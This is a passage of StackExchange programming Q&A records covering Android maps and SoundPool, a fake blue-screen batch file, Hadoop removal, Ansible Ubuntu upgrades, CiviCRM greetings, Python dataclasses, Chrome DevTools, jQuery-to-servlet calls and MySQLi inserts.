points\n * Courtesy : jeffreysambells.com\/2010\/05\/27\/decoding-polylines-from-google-maps-direction-api-with-java\n * *\/\nprivate List<LatLng> decodePoly(String encoded) {\n\n List<LatLng> poly = new ArrayList<LatLng>();\n int index = 0, len = encoded.length();\n int lat = 0, lng = 0;\n\n while (index < len) {\n int b, shift = 0, result = 0;\n do {\n b = encoded.charAt(index++) - 63;\n result |= (b & 0x1f) << shift;\n shift += 5;\n } while (b >= 0x20);\n int dlat = ((result & 1) != 0 ? ~(result >> 1) : (result >> 1));\n lat += dlat;\n\n shift = 0;\n result = 0;\n do {\n b = encoded.charAt(index++) - 63;\n result |= (b & 0x1f) << shift;\n shift += 5;\n } while (b >= 0x20);\n int dlng = ((result & 1) != 0 ? 
~(result >> 1) : (result >> 1));\n lng += dlng;\n\n LatLng p = new LatLng((((double) lat \/ 1E5)),\n (((double) lng \/ 1E5)));\n poly.add(p);\n }\n return poly;\n} }\n<\/code>\nactivity_main.xml:\ni used two fields in relative layout:\n<code> <TextView\n android:id=\"@+id\/tv_distance_time\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\"\n android:text=\"@string\/hello_world\"\n android:layout_alignParentTop=\"true\" \/>\n\n<fragment\n android:id=\"@+id\/map\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\"\n android:layout_below=\"@id\/tv_distance_time\" \/>\n<\/code>\nAndroidManifest.xml:\n<code><?xml version=\"1.0\" encoding=\"utf-8\"?>\n<\/code>\n\n<code><uses-permission android:name=\"android.permission.WRITE_EXTERNAL_STORAGE\"\/>\n<uses-permission android:name=\"com.google.android.providers.gsf.permission.READ_GSERVICES\"\/>\n<uses-permission android:name=\"android.permission.ACCESS_COARSE_LOCATION\"\/>\n<uses-permission android:name=\"android.permission.ACCESS_FINE_LOCATION\"\/>\n<permission\n android:name=\"com.start.yogeshp.location.permission.MAPS_RECEIVE\"\n android:protectionLevel=\"signature\" \/>\n\n<uses-permission android:name=\"com.start.yogeshp.location.permission.MAPS_RECEIVE\" \/>\n\n<uses-feature\n android:glEsVersion=\"0x00020000\"\n android:required=\"true\"\/>\n<application\n android:allowBackup=\"true\"\n android:icon=\"@mipmap\/ic_launcher\"\n android:label=\"@string\/app_name\"\n android:supportsRtl=\"true\"\n android:theme=\"@style\/AppTheme\">\n <activity android:name=\".MainActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" \/>\n\n <category android:name=\"android.intent.category.LAUNCHER\" \/>\n <\/intent-filter>\n <\/activity>\n <meta-data\n android:name=\"com.google.android.maps.v2.API_KEY\"\n android:value=\"key\" \/>\n\n<\/application>\n<\/code>\n\nand finally added \"compile 'com.google.android.gms:play-services:8.3.0'\" to my build.gradle file.\nComment: try\nComment: It worked..!!! thanks alot @JRowan\nComment: your welcome, ill put it as answer\nAnswer: in your layout you forgot the class attribute\n<code><fragment \nclass=\"com.google.android.gms.maps.SupportMapFragment\" \nandroid:id=\"@+id\/map\"\nandroid:layout_width=\"wrap_content\"\nandroid:layout_height=\"wrap_content\"\nandroid:layout_below=\"@id\/tv_distance_time\">\n<\/code>\n","meta":{"source":"stackoverflow","title":"Driving distance and travel time duration between two locations in Google Map Android API V2","dup_signals":{}},"subset":"stackexchange"} +{"text":"Identify if the android device is one of the samsung edge devices\n\nQuestion: I have a requirement in which I have to figure out if my android app is running on one of the samsung edge devices or its a regular android phone. Accordingly my ui would update. All i could gather is that the device name has a substring edge in it. Can someone suggest me a a a better way to do this ?\nComment: I think the only way is to store a list of edge device models in your app, and check current device against this list.\nComment: Yes of course that could be a way. But is there nothing which could inform me of this from the device itself ?\nComment: I don't think that Android itself has any clue about something called *edge*. 
It is a Samsung-only feature, and I believe there is nothing to identify it in Android OS.\nComment: Yes but devices do come with hardware information\nComment: try to get device name and model and add some if conditions if it works for you. refer this [link](https:\/\/stackoverflow.com\/a\/38157223\/6454463) to get device details.\nAnswer: For samsung device's, take a look at the Samsung programming guide for Edge, in page 10 :\n\ninitialize() initializes Look. You need to initialize the Look package\n before you can use it. If the device does not support Look,\n SsdkUnsupportedException exception is thrown.\nIf an SsdkUnsupportedException exception is thrown, check the\n exception message type using SsdkUnsupportedException.getType(). The\n following two types of exception messages are defined in the Slook\n class: \n VENDOR_NOT_SUPPORTED: The device is not a Samsung device.\n DEVICE_NOT_SUPPORTED: The device does not support the Look package.\n\nSo you can do this:\n<code>Slook slook = new Slook(); \ntry { \n slook.initialize(this); \/\/ it is a edge \n} catch(SsdkUnsupportedException e) \n{ \n \/\/ it is not an edge \n}\n<\/code>\nComment: I believe this will help, will approve the answer once after I implement it\n","meta":{"source":"stackoverflow","title":"Identify if the android device is one of the samsung edge devices","dup_signals":{}},"subset":"stackexchange"} +{"text":"This batch code is not working\n\nQuestion: Fake blue screen is not working: \nEverything after echo os the text even '***'\n\n<code>@echo off \nmode con: cols=160 lines=180\ncolor 1f \necho ***STOP: 0x000000D 1 (0x00000000, 0xF73120AE, 0xC0000008, 0xC0000000 \necho. \necho A problem has been detected and Windows has been shut down to prevent damage \necho to your computer\necho. \necho DRIVER_IRQL_NOT_LESS_OR_EQUAL \necho. \necho If this is the first time you've seen this Stop error screen, restart your \necho computer. If thi screen appears again, follow these steps: \necho. \necho Check to make sure any new hardware or software is properly installed. If this is a \necho new installation, ask your hardware or software manifacturer for any Windows updates \necho you might need. \necho. \necho If problems continue, disable or remove any newly installed hardware or software. \necho Disable BIOS memory options such as cachsing or shadowing. If you need to use Safe \necho Mode to remove or disable components, restart your computer, press f8 to select \necho Advanced Startup Options, and then select Safe Mode. \necho.\necho *** WXYZ.SYS - Adress F73120AE base at C00000000, DateStamp 36b07a3 \necho. \necho. \necho Kernel Debugger Using: COM2 (Port 0x2f8, Baud Rate 19200> \necho Beginning dump of phisical memory \necho Physical memory dump complete. Contact your system administrator or \necho technical support group. \nPause \necho. \n<\/code>\n\nWhat did i do wrong?\nComment: Please provide your current output and the desired output so we can help you (at least clarify what are you looking for)\nComment: owkay Cristian Ramon-Cortes\nAnswer: The problem is the <code>><\/code> on this line\n<code>echo Kernel Debugger Using: COM2 (Port 0x2f8, Baud Rate 19200> \n<\/code>\nIt is recognized as redirection operator to write output to a file.\n","meta":{"source":"stackoverflow","title":"This batch code is not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to uninstall Hadoop 1.0.0\n\nQuestion: I set up my Hadoop clusters with Hadoop 2.0.2. Then, today I tried to test 1.0.0. 
So I downloaded the deb file from the Hadoop website and installed it: It did mess up everything. \nNow, when I type \"which -a hadoop\" I get 2 results \n\none pointing to my old Hadoop installation folder\nand the other one pointing to \/usr\/bin\/hadoop.\n\nSo the question is: how to get rid off of Hadoop 1.0.0 completely?\nComment: IMO using packaging\/installers for java stuff is almost always a mistake; the normal downloads give you complete control.\nComment: yeap, but that wasn't the answer to my question was it?\nComment: Nope, which is why it's a comment, and not an answer.\nAnswer: Try using <code>dpkg -r hadoop<\/code>; this should remove the Hadoop package from the system, but leave the config files intact. If you want to lose the config files as well, try <code>dpkg -P hadoop<\/code> instead.\nAnswer: <code>> $HADOOP_HOME\n> \/home\/shiv\/hadoop\n> sudo rm -r \/home\/shiv\/hadoop\n<\/code>\nAnd Hadoop is uninstalled!\nComment: Found extremely useful\nAnswer: I struggled through this for longer than a while and then decided to share it here:\nThe trick is to basically delete all the symlinks pointing back to locations where HDP components reside since that is what causes 80% of the problem. Here is a step by step tutorial for that:\nhttp:\/\/www.yourtechchick.com\/hadoop\/how-to-completely-remove-and-uninstall-hdp-components-hadoop-uninstall-on-linux-system\/\nHope that helps!\nComment: Your page link is broken\n","meta":{"source":"stackoverflow","title":"How to uninstall Hadoop 1.0.0","dup_signals":{}},"subset":"stackexchange"} +{"text":"Ansible cannot be converted to a dict?\n\nQuestion: I have written a playbook to upgrade my OS from 14.04 to 16.04 and i am getting a lot of interactive prompts.\nHere is an example of a prompt :-\n\nHere is my ansible playbook so far :-\n<code>- hosts: os-updates\n gather_facts: yes\n become: yes\n\n tasks:\n - name: Current Distribution\n debug: msg=\"{{ ansible_distribution }}\"\n\n - name: Current Distribution version\n debug: msg=\"{{ ansible_distribution_version}}\"\n\n - name: Comment out old Docker Repo\n command: sed -i '1 s\/^\/#\/' \/etc\/apt\/sources.list.d\/apt_dockerproject_org_repo.list\n\n # Start the update from current os to next OS\n - name: Update apt get repo\n apt: update_cache=yes force_apt_get=yes cache_valid_time=3600\n when: \n - ansible_os_family == \"Debian\"\n - ansible_distribution_version != \"20.04\"\n\n - name: Upgrade all apt packages\n expect:\n command: sudo apt-get upgrade -y\n responses:\n - \"A new version of \/boot\/grub\/menu.lst is available, but the version installed currently has been locally modified. What would you like to do about menu.lst?\": \"keep the local version currently installed\"\n - \"A new version of \/boot\/grub\/menu.lst is available, but the version installed currently has been locally modified. What would you like to do about menu.lst?\": \"keep the local version currently installed\"\n\n - name: Success test\n debug:\n msg: \"{{ }}\" \n<\/code>\nBut i keep running into the following error message :-\n<code>FAILED! => {\"changed\": false, \"msg\": \"argument responses is of type <type 'list'> and we were unable to convert to dict: <type 'list'> cannot be converted to a dict\"}\n<\/code>\nWhat am i doing wrong? Any help will be appreciated. 
Thank you.\nComment: The `expect` module, either requires a list of answers or a dictionary of `key => question`; `value => answer`, not a list of dictionary, as you are providing it at the moment.\nComment: Have you tried the using `apt` module itself? There is an example which shows how to `Upgrade all packages` (or `dist-upgrade`).\nComment: `What am i doing wrong?` <= As documented on the module page and as clearly reported by your error message, you are passing a list in `responses` where it is expecting a dict.\nComment: @\u03b2.\u03b5\u03b7\u03bf\u03b9\u03c4.\u03b2\u03b5 Awesome. I'll give that a try.\nAnswer: This is what I have used to upgrade from Ubuntu 16.04 to 18.04 to 20.04\n4 files - 2 tasks, 1 handler and a playbook.\nos-upgrade-ubuntu.tsk\nreboot-if-needed.tsk\nreboot-if-needed.hnd\nplaybook.yml\nos-upgrade-ubuntu.tsk\n<code># Use a block to perform tasks conditionally\u2014only if running Ubuntu \n#- debug: msg=\"os-upgrade-ubuntu.tsk {{oldos}} ... {{newos}}\"\n - debug: msg=\"os-upgrade-ubuntu.tsk ... checking for OS Upgrade current version {{ansible_distribution_version}}\"\n\n - name: regather facts to get the latest information \n setup:\n\n - name: Verify DNS resolution\n raw: (echo \"nameserver 184.108.40.206\" | resolvconf -d any && echo \"nameserver 184.108.40.206\" | resolvconf -a any)\n #ignore_errors: true\n\n - block:\n - name: OS Upgrade ... Remove the EOL message of the day if one exists.\n file:\n path: \"{{ item }}\"\n state: absent\n with_items:\n - \/etc\/update-motd.d\/99-esm\n - \/run\/motd.dynamic\n\n - name: OS Upgrade ... Upgrade all packages to the latest version\n apt: update_cache=yes upgrade=full\n\n - name: OS Upgrade ... Ensure update-manager-core is installed.\n apt: name=update-manager-core state=present\n\n - import_tasks: reboot-if-needed.tsk\n\n - name: OS Upgrade ... Run do-release-upgrade non-interactively.\n command: do-release-upgrade -f DistUpgradeViewNonInteractive\n\n - name: regather facts to get the latest information \n setup:\n\n when: ansible_distribution == 'Ubuntu' \n #when: ansible_distribution == 'Ubuntu' and ansible_distribution_version == {{oldos}}\n\n# After the playbook is finished, it's a good idea to confirm all the servers\n# are actually upgraded. Run something like:\n# ansible [group] -a \"lsb_release -a\"\n<\/code>\nreboot-if-needed.tsk\n<code> - name: check if a reboot is required\n shell: \"[ -f \/var\/run\/reboot-required ]\"\n failed_when: false\n register: reboot_required\n changed_when: reboot_required.rc == 0\n notify: \n - reboot\n - wait_for_ready\n\n# make handlers run ... 
now and not at end of play\n - name: flush handlers\n meta: flush_handlers\n<\/code>\nreboot-if-needed.hnd\n<code> - name: reboot\n reboot:\n reboot_timeout: 1200\n test_command: mount\n\n - name: wait_for_ready\n wait_for:\n host: \"{{ ansible_ssh_host }}\"\n port: 22\n state: started\n connection: local\n become: no\n<\/code>\nplaybook.yml\n<code>---\n- name: Update OS and apply patches\n hosts: all\n gather_facts: yes\n handlers:\n - include: reboot-if-needed.hnd\n tass:\n\n # If system requires a reboot, then reboot\n - import_tasks: reboot-if-needed.tsk\n\n - name: Install Aptitude if needed\n raw: test -e \/usr\/bin\/aptitude || (apt -y update && apt install -y aptitude)\n\n - name: Verify DNS resolution\n raw: (echo \"nameserver 220.127.116.11\" | resolvconf -d any && echo \"nameserver 220.127.116.11\" | resolvconf -a any)\n #ignore_errors: true\n\n - name: Update apt cache\n apt:\n update_cache: yes\n cache_valid_time: 3600\n\n - name: Upgrade all packages to the latest version\n apt:\n name: \"*\"\n state: latest\n - name: Remove dependencies that are no longer required\n apt:\n autoremove: yes\n\n - import_tasks: reboot-if-needed.tsk\n\n - block:\n - set_fact:\n oldos: 16.04\n newos: 18.04\n - import_tasks: reboot-if-needed.tsk\n - import_tasks: os-upgrade-ubuntu.tsk\n - import_tasks: reboot-if-needed.tsk\n when: ansible_distribution == 'Ubuntu' and ansible_distribution_version == '16.04'\n\n - block:\n - set_fact:\n oldos: 18.04\n newos: 20.04\n - import_tasks: reboot-if-needed.tsk\n - import_tasks: os-upgrade-ubuntu.tsk\n - import_tasks: reboot-if-needed.tsk\n when: ansible_distribution == 'Ubuntu' and ansible_distribution_version == '18.04'\n\n # if running Ubuntu 20.04 - no upgrade to be done\n - block:\n - debug:\n msg: 'This server is running Ubuntu 20.04 LTS ... no upgrade will be performed.'\n when: ansible_distribution == 'Ubuntu' and ansible_distribution_version == '20.04'\n - import_tasks: reboot-if-needed.tsk\n<\/code>\n","meta":{"source":"stackoverflow","title":"Ansible cannot be converted to a dict?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Passing soundpool to multiple activities in Android\n\nQuestion: Basically, in a short explanation, I am making a sound board. Once I run the initial activity, it adds all sound clips to the soundpool. I then have two other activities that are to organize the sound clips, and I would like to use the previously loaded soundpool so that there isn't move load time when switching between activities. I am fairly new to this Android coding, so please make things in simple terms!\nEDIT: Also, does anybody know how to stop the playback on a second button click? Not as in clicking a different button, I understand that, but if the same button is clicked, it will stop it?\nMy main activity:\n<code>private SoundManager mSoundManager;<\/code>\n<code>\/** Called when the activity is first created. 
*\/\n@Override\npublic void onCreate(Bundle savedInstanceState) {\n this.setVolumeControlStream(AudioManager.STREAM_MUSIC);\n super.onCreate(savedInstanceState);\n requestWindowFeature(Window.FEATURE_NO_TITLE);\n getWindow().setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN,\n WindowManager.LayoutParams.FLAG_FULLSCREEN); \n setContentView(R.layout.main);\n mSoundManager = new SoundManager();\n mSoundManager.initSounds(getBaseContext());\n mSoundManager.addSound(0, R.raw.stop_playing);\n mSoundManager.addSound(1, R.raw.sound1);\n mSoundManager.addSound(2, R.raw.sound2);\n mSoundManager.addSound(3, R.raw.sound3);\n<\/code>\nDealing with soundpool stuff:\n<code>public void initSounds(Context theContext) { \n mContext = theContext;\n mSoundPool = new SoundPool(1, AudioManager.STREAM_MUSIC, 0); \n mSoundPoolMap = new HashMap<Integer, Integer>(); \n mAudioManager = (AudioManager)mContext.getSystemService(Context.AUDIO_SERVICE);\n }<\/code>\n<code>public void addSound(int Index,int SoundID)\n{\n mSoundPoolMap.put(Index, mSoundPool.load(mContext, SoundID, 1));\n\n}\n\npublic void pauseSound(){\n mSoundPool.autoPause();\n}\n\npublic void stopSound(){\n mSoundPool.stop(playingNumber);\n}\n\npublic int playSound(int index) { \n\n int streamVolume = mAudioManager.getStreamVolume(AudioManager.STREAM_MUSIC); \n int soundId = mSoundPool.play(mSoundPoolMap.get(index), streamVolume, streamVolume, 1, 0, 1f);\n mSoundPool.play(mSoundPoolMap.get(index), streamVolume, streamVolume, 1, 0, 1f); \n playingNumber = index;\n return playingNumber;\n}\n<\/code>\n}\nAnswer: Alwade create Application class, and create static SoundManager instance in the your application class, and add needed sounds to SoundManager in the Initial activity. Then you can use current Soundmanager in other activities. Change SoundManager class to static class. \nFor example:\n<code>public class MyApplication extends Application {\n\n public static SoundManager soundManager;\n\n public static SoundManager getSoundManager() {\n return soundManager;\n }\n\n public static void setSoundManager(SoundManager soundManagerIns) {\n soundManager = soundManagerIns;\n }\n\n}\n<\/code>\nand in the initial activity create instance and set it to :\n<code>mSoundManager = new SoundManager();\nmSoundManager.initSounds(getApplicationContext);\nmSoundManager.addSound(0, R.raw.stop_playing);\nmSoundManager.addSound(1, R.raw.choo_choo);\nmSoundManager.addSound(2, R.raw.all);\nmSoundManager.addSound(3, R.raw.hearts);\n\nMyApplication.setSoundManager(mSoundManager);\n<\/code>\nThen you can get this SoundManager in the other activities:\nSoundManager sManager = MyApplication.getSoundManager();\nThis is my example project: SoundPoolExample\nComment: But if were using void for getSoundManager(), how can we return something? I haven't used java in a long time, so I apologize\nComment: Sorry alwade24, I wrote this code in the text of Editor because I scored prostitution look at my post editet.\nComment: Sorry for that late answer your commentary, I'm logged in to stackoverflow now.\nComment: ahhh okay. And not a problem, I may not get around to this until later, I've got a COBOL final in the morning, so I have some studying to do. I'll mark it as answered, but I may have more questions! 
I appreciate the help!!\nComment: What do you mean when you say \"create instance and set it to\"?\nComment: You need to create at least one instance of the class SoundManager for using.\nComment: And set this intance to soundManager field of MyApplication class (MyApplication.setSoundManager(mSoundManager))\nComment: I then get the message \"The method newInstance(void) is undefined for the type SoundManager\".... Do I want to create that as a method in SoundManager? I apologize, like I said, I haven't had java in a few years, and I don't think we ever dealt with creating instances.... So I'm kinda in the dark, I may not have even done that right\nComment: alwade24 you create SoundManager soundManager = new SoundManager(); and set its to app class: MyApplication.setSoundManager(soundManager);. Send your code to my email.\nComment: See example, i set access to your email, you can download this project: https:\/\/docs.google.com\/file\/d\/0BxNIUTd_m1x8MGlyY2VlNTZERDg\/edit?usp=sharing\n","meta":{"source":"stackoverflow","title":"Passing soundpool to multiple activities in Android","dup_signals":{}},"subset":"stackexchange"} +{"text":"Multilingual Email Greeting\n\nQuestion: CiviCRM for WordPress 4.7.15\nProblem: Fix the Email Greeting, so it takes advantage of the preferred language and gender fields. I took a look at:\nhttps:\/\/wiki.civicrm.org\/confluence\/display\/CRMDOC\/Recipe+for+German+Name+and+Greetings+Handling\nThe page to edit the Email Greeting is hidden under Administration\/System Settings\/Option Groups - Email Type Greeting Options\nI came up with the following which works nicely when used in a Smarty Message Template.\n<code>{capture assign=l}{contact.preferred_language}{\/capture} \n{capture assign=g}{contact.gender}{\/capture} \n{if $l=\"en_CA\"}Dear{else}{if $g=\"Male\"}Cher{else}Ch\u00e8re{\/if}{\/if} {contact.first_name} {contact.last_name}\n<\/code>\nTo test it, one selects the new Email Greeting from the drop down on the Contacts Summary page in the Communication Preferences section. Then clicks Save. At this point, the CiviCRM says.\n\nAny suggestions? I'm considering adding 3 Greetings and updating all 2697 records via SQL. \nComment: In case this is still relevant, make sure that smarty is enabeld as described here: https:\/\/wiki.civicrm.org\/confluence\/display\/CRMDOC\/Smarty+in+mail+templates\nAnswer: I am a bit of a hurry at the moment - we use a greeting based on the prefix - maybe it helps:\n\n{capture assign=c}{contact.communication_style}{\/capture}{capture assign=p}{contact.individual_prefix}{\/capture}{if $p==\"Frau\"}Liebe{else}Lieber{\/if}{ }{if $c==\"Familiar\"}{ }{contact.first_name}{else}{$p}{ }{contact.formal_title}{contact.last_name}{\/if}\nComment: Are you on 4.7.15? Because in my case, using the greeting with capture commands \"crashes\" CiviCRM page. Crashes as in it never finishes reloading the page. In the message context the variables are defined. Maybe they are not in the greeting context. Worth a try.\nComment: I tried just contract.preferred_language and just contact.gender and both resulted in a Network Error.\nComment: I just ried it on the sandbox which is on 4.7.17 - seems to work\nComment: I gave up and did it via SQL\nAnswer: Meanwhile, we have developed a new extension which may help people struggling with many different and or\/complex greetings. 
The extension (including documentation) can be found here.\n","meta":{"source":"civicrm.stackexchange","title":"Multilingual Email Greeting","dup_signals":{}},"subset":"stackexchange"} +{"text":"bottom up method development parameter passing\n\nQuestion: I develop bottom up, starting with small simple methods to go to the big full fledged implementation\n<code>class Pop(object):\n\n def welcome(self, name, new_member = False):\n response = \"\"\n if new_member:\n response = \" NOT\"\n return str(\"hello there \"+name+\", you seem\"+response+\" to be a member\\n\")\n\n def ageVerification(self, name, age, new_member = False):\n the_welcome_string = self.welcome(name, new_member)\n minimum = \"\"\n excuse = \"\"\n if age < 16:\n minimum = \" NOT\"\n excuse = \", sorry\"\n return str(the_welcome_string+str(age)+\" is\"+minimum+\" the minimum required age to buy beer in Belgium\"+excuse+\"\\n\")\n\n def theWholething(self, name, age, address, new_member = False):\n if age < 16:\n appology = str(\"you cannot order any beer\\n\")\n else:\n appology = str(\"your beer will be shipped to \"+address+\"\\n\")\n return str(self.ageVerification(name, age, new_member)+appology) \n \n# EOF\n<\/code>\nMy question is if it is normal that when i reach theWholeThingMethod, I carry along all the parameters of the previously defined methods? Is this pythonic?\nMy population class has almost 20 \"helper\" methods called in theWholeThing, and it seems I am just fiddling with parameters to get them in the right order ...\n<code>theWholeThing(self,\\\n name,\\\n age,\\\n address,\\\n registered = True,\\\n first_date_entered,\\\n last_date_entered,\\\n purchased_amount,\\\n favorite_beer,\\\n promotional_code,\\\n and_so_on0,\\\n and_so_on1,\\\n and_so_on2,\\\n and_so_on3,\\\n and_so_on4,\\\n and_so_on5,\\\n and_so_on6,\\\n and_so_on7,\\\n and_so_on8,\\\n and_so_on9,\\\n and_so_on10): \n<\/code>\nComment: Where do all these parameters *come from*? Could you accumulate or store the parameters themselves in an object (e.g. a class) - and then just pass the one object around? (Or, store the data on `Pop` directly!)\nComment: A 20-parameter method or function won't be very readable hence not very pythonic.\nAnswer: \nMy question is if it is normal that when i reach theWholeThingMethod, I carry along all the parameters of the previously defined methods? Is this pythonic?\n\nNeither.\nThere is really no point in having a class if all the methods take all the arguments anyway. 
These might as well just be functions.\nThere are many ways this could be done, depending on whether the various parameters are mandatory, or what happens when one is not provided, but here is one possibility:\n<code>from dataclasses import dataclass\n\n@dataclass\nclass Pop(object):\n\n name: str\n age: int\n address: str\n new_member : bool = False\n\n def welcome(self):\n response = \"\"\n if self.new_member:\n response = \" NOT\"\n return str(\"hello there \"+self.name+\", you seem\"+response+\" to be a member\\n\")\n\n def ageVerification(self):\n the_welcome_string = self.welcome()\n minimum = \"\"\n excuse = \"\"\n if self.age < 16:\n minimum = \" NOT\"\n excuse = \", sorry\"\n return str(the_welcome_string+str(self.age)+\" is\"+minimum+\" the minimum required age to buy beer in Belgium\"+excuse+\"\\n\")\n\n def theWholething(self):\n if self.age < 16:\n appology = str(\"you cannot order any beer\\n\")\n else:\n appology = str(\"your beer will be shipped to \"+self.address+\"\\n\")\n return str(self.ageVerification()+appology) \n \n# EOF\n<\/code>\nNote: @nneonneo had a great suggestion of using a dataclasses, so answer tweaked to incorporate that\nComment: fwiw: it may be more readable to do this as a data class with defaults in the dataclass definition. Then you won't need to do `setattr` magic.\nComment: Great suggestion @nneonneo, thanks. Haven't used them much, so didn't cross my mind, but they seem perfect for this.\nComment: would *args and **kwargs not be better solution than dataclass\nComment: @hewi: Probably a matter of personal opinion. I'd certainly prefer the dataclass over a long list of parameters in the function signature, then all the boiler plate of `self.some_arg = some_arg`\n","meta":{"source":"stackoverflow","title":"bottom up method development parameter passing","dup_signals":{}},"subset":"stackexchange"} +{"text":"Google chrome inspecting media queries colored bars\n\nQuestion: The documentation for Google Chrome Emulator at https:\/\/developer.chrome.com\/devtools\/docs\/device-mode says, \n\n\"To view the media query inspector, click the Media queries media queries icon icon in the upper left corner of the viewport. The DevTools detect media queries in your stylesheets and display them as colored bars in the top ruler.\" \n\nI have clicked on the icon and notice that it is active. However, no colored bars appear anywhere. \nChrome tells me that my version, Version 38.0.2125.122, is up-to-date. The rest of the emulator seems to work OK. The colored bars documented would be REALLY helpful, so I would be extremely grateful if someone could complete or correct Google's instructions. \nWhat would be really terrific is if the emulator could display the file name of the external .css document, as I have a mediaqueries.css document that points (that's the object anyway) to various .css external style sheets. Based on what I'm seeing under the \"Elements\" tab in the \"dock\"? (Google doesn't seem to have a name for the window), it looks like some of the tests, e.g, \"Apple iPhone 3GS\" or \"Apple iPhone 5\", etc., are picking up styles from different style sheets. I didn't know that was possible. \nComment: Wall of text, is hard to read.\nAnswer: I believe this is the area they're talking about. 
You should see this in emulator mode.\n\nOnce you click the emulator icon, this appears at the top of the browser viewport (not at the bottom where the dev tools are.\n","meta":{"source":"stackoverflow","title":"Google chrome inspecting media queries colored bars","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to call a servlet from a jQuery's $.ajax() function\n\nQuestion: I am trying to call a servlet from jQuery's .ajax() function.\nAt the moment I don't think I am even calling the servlet or passing paramaters to it, however lots of Googling doesn't seem to have helped. Any ideas?\nThis is my html:\n<code><html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=ISO-8859-1\">\n<script type=\"text\/javascript\" src=\"jquery.js\"><\/script>\n<script type=\"text\/javascript\">\nfunction login(){ \n\n $(\"#loading\").hide();\n\n var email = document.nameForm.email.value; \n $.ajax({ \n type: \"GET\", \n url: \"ProcessForm\", \n data: \"email=\"+email, \n success: function(result){ \n alert(result);\n } \n }); \n} \n<\/script>\n<title>My AJAX<\/title>\n<\/head>\n<body>\n<p>This time it's gonna work<\/p>\n<form name=\"nameForm\" id=\"nameForm\" method=\"post\" action=\"javascript:login()\">\n<\/code>\nEmail \n \n \n \n loading\n<code><\/body>\n<\/html>\n<\/code>\nAnd my web.xml\n<code><?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<web-app xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" xmlns=\"http:\/\/java.sun.com\/xml\/ns\/javaee\" xmlns:web=\"http:\/\/java.sun.com\/xml\/ns\/javaee\/web-app_2_5.xsd\" xsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee http:\/\/java.sun.com\/xml\/ns\/javaee\/web-app_2_5.xsd\" id=\"WebApp_ID\" version=\"2.5\">\n <display-name>ajaxtry<\/display-name>\n <welcome-file-list>\n<welcome-file>index.html<\/welcome-file>\n<welcome-file>index.htm<\/welcome-file>\n<welcome-file>index.jsp<\/welcome-file>\n<welcome-file>default.html<\/welcome-file>\n<welcome-file>default.htm<\/welcome-file>\n<welcome-file>default.jsp<\/welcome-file>\n <\/welcome-file-list>\n\n <servlet>\n<servlet-name>ProcessForm<\/servlet-name>\n<servlet-class>com.ajaxtry.web.ProcesFormServlet<\/servlet-class>\n <\/servlet>\n <servlet-mapping>\n<servlet-name>ProcessForm<\/servlet-name>\n<url-pattern>\/ProcessForm<\/url-pattern>\n <\/servlet-mapping>\n<\/web-app>\n<\/code>\nThe servlet is just a template at the moment:\n<code>package com.ajaxtry.web;\n\n\/\/ imports here\n\npublic class ProcessFormServlet {\n\n public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {\n\n response.setContentType(\"text\/html\");\n PrintWriter out = response.getWriter();\n\n System.out.println(request.getParameter(\"email\")); \n }\n}\n<\/code>\nAnswer: A couple of problems here:\nYou're calling System.out.println, which is just sending output to standard out - not to the browser. Try changing \"System.out.println\" to just \"out.println\"\nIt looks like you've defined doPost() in your servlet code, but your javascript is using the \"GET\" method. Rename doPost() to doGet(), or define both of them.\nThat being said, you probably shouldn't bother with the javascript at all until you've actually got the servlet working, to keep it simple. You should be able to test it by loading \/ProcessForm?email=testing in your browser and see some output. 
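For reference, a minimal sketch of that servlet is below. It assumes the class also extends HttpServlet (the template above omits the superclass) and uses an illustrative output string, so adjust it to your needs:\n<code>package com.ajaxtry.web;\n\nimport java.io.IOException;\nimport java.io.PrintWriter;\nimport javax.servlet.ServletException;\nimport javax.servlet.http.HttpServlet;\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\n\npublic class ProcessFormServlet extends HttpServlet {\n\n    @Override\n    public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n\n        \/\/ Write to the response body (not standard out) so the browser, and later the ajax call, can read it\n        response.setContentType(\"text\/html\");\n        PrintWriter out = response.getWriter();\n        out.println(\"email = \" + request.getParameter(\"email\"));\n    }\n}\n<\/code>\nWhile you are at it, double-check the web.xml above: it declares the class as com.ajaxtry.web.ProcesFormServlet (one \"s\"), while the Java class is named ProcessFormServlet, so the container will not be able to load it.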
Once you get that going, then you can start worrying about the front-end code.\nHope this helps get you started.\nComment: Thanks, I had already done the first two things, the second is a good suggestion, I think that will be the way to go.\nComment: I mean the third, the second is an obvious mistake ;)\n","meta":{"source":"stackoverflow","title":"How to call a servlet from a jQuery's $.ajax() function","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP: Insert into MySQL database and check if already existing - with binding parameters\n\nQuestion: I am trying to insert test data into a MySQL database using the below lines which works fine so far. \n1) How can I check whether the email already exists in the database and if, echo a message? I saw references here to the use of <code>WHERE EXISTS<\/code> or <code>mysqli_num_rows<\/code> but I am not sure which and how to apply here - in combination with binding parameters.\n2) I came across <code>unset($username, $password, $database);<\/code> to make this query more secure. Is that something that is needed \/ useful here and if, where should I put it ? \nMy PHP: \n<code>$conn = new mysqli($host, $username, $password, $database);\nif($conn->connect_error) {\n die(\"Connection failed: \" . $conn->connect_error);\n}\n\n$stmt = $conn->prepare(\"INSERT INTO cust (email, pw) VALUES (?, ?)\");\n$stmt->bind_param(\"ss\", $email, $hashPw);\n\n$email = \"firstname.lastname@example.com\";\n$pw = \"testpw12345\"; \n$hashPw = password_hash($pw, PASSWORD_DEFAULT); \n$stmt->execute();\n\necho \"Success\";\n\n$stmt->close();\n$conn->close();\n<\/code>\nComment: [How to get the error message in MySQLi?](https:\/\/stackoverflow.com\/a\/22662582\/1839439)\nComment: As for your second question, it would be better to use constants or hardcode the values instead of using variables, which you would then need to unset. Also encapsulation would come in handy here.\nAnswer: An alternative to the solution proposed already. 